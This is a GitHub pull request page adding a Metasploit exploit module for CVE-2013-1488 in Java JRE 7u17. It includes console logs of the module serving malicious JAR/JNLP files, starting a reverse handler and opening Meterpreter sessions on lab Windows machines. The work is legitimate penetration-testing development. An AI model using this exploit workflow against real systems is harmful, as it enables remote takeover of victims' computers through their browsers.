Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2013-1488 #1924

Merged
merged 3 commits into from Jun 7, 2013
Merged

Add module for CVE-2013-1488 #1924

merged 3 commits into from Jun 7, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Module for the awesome bug and exploitation road described by @tiraniddo, impressive work from him.

Here is my try to put the msf module. Hope Iam not forgetting nothing in the PR. Tested on Win / IE8 and Win/ Google Chrome. Also Bypasses click2play on IE. Needs java jre 17u17. It's one of the bugs patched after pwn2own.

Test:

msf exploit(java_jre17_driver_manager) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/k0OEsxDx
[*]  Local IP: http://10.6.0.165:8080/k0OEsxDx
[*] Server started.
msf exploit(java_jre17_driver_manager) > [*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/vbcDqcRu.jar
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/vbcDqcRu.jar
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/org.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/com.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/edu.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/net.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] Sending stage (30355 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:52828) at 2013-06-07 13:33:32 -0500
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/PpOfCKYH.jnlp
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/rvoXPXke.jar
[*] Sending stage (30355 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:52860) at 2013-06-07 13:33:44 -0500

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 7, 2013

Processing......

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 7, 2013

Tested on Win 8, merging shortly:

ph33r:~ wchen$ msfconsole -q
msf exploit(java_jre17_driver_manager) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/qJm82ZPQYw
[*]  Local IP: http://10.0.1.76:8080/qJm82ZPQYw
[*] Server started.
msf exploit(java_jre17_driver_manager) > [*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/wOVRAtWq.jnlp
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/bCENzNFF.jar
[*] Sending stage (30355 bytes) to 10.0.1.85
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.85:49482) at 2013-06-07 15:05:26 -0500

msf exploit(java_jre17_driver_manager) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : WIN-VFQHRRTCA39
OS          : Windows 8 6.2 (x86)
Meterpreter : java/java
meterpreter >

wchen-r7 added a commit that referenced this pull request Jun 7, 2013
@wchen-r7
Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488
aefcc51 
)
@wchen-r7 wchen-r7 merged commit 79bfdf3 into rapid7:master Jun 7, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_jre17_driver_manager branch November 18, 2014 15:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7